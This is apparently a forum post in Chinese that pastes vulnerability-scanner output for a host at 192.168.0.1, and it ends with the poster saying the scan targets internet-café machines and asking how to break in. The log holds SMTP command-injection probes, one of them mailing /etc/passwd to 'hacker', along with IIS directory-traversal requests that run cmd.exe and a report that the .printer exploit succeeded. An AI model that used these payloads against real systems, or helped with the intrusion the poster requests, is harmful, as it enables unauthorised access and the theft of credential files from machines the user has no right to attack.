SMTP检测支持VRFY
检测 SMTP->192.168.0.1 250 server1 Hello [192.168.0.62]
检测 SMTP->192.168.0.1 检测debug漏洞 500 5.3.3 Unrecognized command
检测 SMTP->192.168.0.1 检测kill漏洞 500 5.3.3 Unrecognized command
检测 SMTP->192.168.0.1 检测wiz漏洞 500 5.3.3 Unrecognized command
检测 SMTP->192.168.0.1 检测rcpt to: /tmp/.rhosts漏洞 503 5.5.2 Need Mail From: first
检测 SMTP->192.168.0.1 检测+ +漏洞 500 5.3.3 Unrecognized command
检测 SMTP->192.168.0.1 检测RSET漏洞 250 2.0.0 Resetting
检测 SMTP->192.168.0.1 检测mail from: |/bin/mail hacker < /etc/passwd漏洞 501 5.5.4 Invalid arguments
检测 SMTP->192.168.0.1 检测RSET漏洞 250 2.0.0 Resetting
检测 SMTP->192.168.0.1 检测mail from: |tail|sh漏洞 250 2.1.0 |tail|sh@server1....Sender OK
--------------------------------------------------------------------------------
弱口令检测
--------------------------------------------------------------------------------
端口检测
25 [smtp]
110 [pop3]
80 [http]
135 [epmap]
139 [netbios-ssn]
443 [https]
--------------------------------------------------------------------------------
CGI/ASP漏洞
192.168.0.1/*.idq
192.168.0.1/*.ida
192.168.0.1/?PageServices
192.168.0.1/_vti_bin/fpcount.exe?Page=default.htm|Image=2|Digits=1
192.168.0.1/_vti_inf.html
192.168.0.1/_vti_bin/shtml.exe
192.168.0.1/_vti_bin/shtml.dll
192.168.0.1/_vti_bin/shtml.dll/nosuch.htm
192.168.0.1/null.htw?CiWebHitsFile=/index.asp%20&CiRestriction=none&CiHiliteType=Full
192.168.0.1/?wp-cs-dump
192.168.0.1/?wp-stop-ver
192.168.0.1/?wp-html-rend
192.168.0.1/?wp-uncheckout
192.168.0.1/?wp-start-ver
192.168.0.1/?wp-usr-prop
192.168.0.1/?wp-ver-diff
192.168.0.1/?wp-verify-link
192.168.0.1/?wp-ver-info
192.168.0.1/_vti_bin/fpcount.exe
192.168.0.1/_vti_bin/shtml.dll/_vti_rpc
192.168.0.1/abczxv.htw
192.168.0.1/blabla.idq
192.168.0.1/scripts/samples/search/author.idq
192.168.0.1/scripts/samples/search/filesize.idq
192.168.0.1/scripts/samples/search/filetime.idq
192.168.0.1/scripts/samples/search/query.idq
192.168.0.1/scripts/samples/search/qsumrhit.htw
192.168.0.1/scripts/samples/search/qfullhit.htw
192.168.0.1/scripts/samples/search/simple.idq
192.168.0.1/scripts/samples/search/queryhit.idq
192.168.0.1/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir%20c:\
192.168.0.1/scripts/..%255c../winnt/system32/cmd.exe?/c+dir+c:\
192.168.0.1/_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+dir
192.168.0.1/_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir
192.168.0.1/_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+dir
192.168.0.1/_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+dir
192.168.0.1/scripts/..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir
192.168.0.1/scripts/..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir
192.168.0.1/scripts/..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir
192.168.0.1/scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir
192.168.0.1/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir
192.168.0.1/null.htw
192.168.0.1/prxdocs/misc/prxrch.idq
IIS5.0 NULL.printer Exploit ...OK
这是我扫描网吧机子的结果!下面该怎么入侵啊?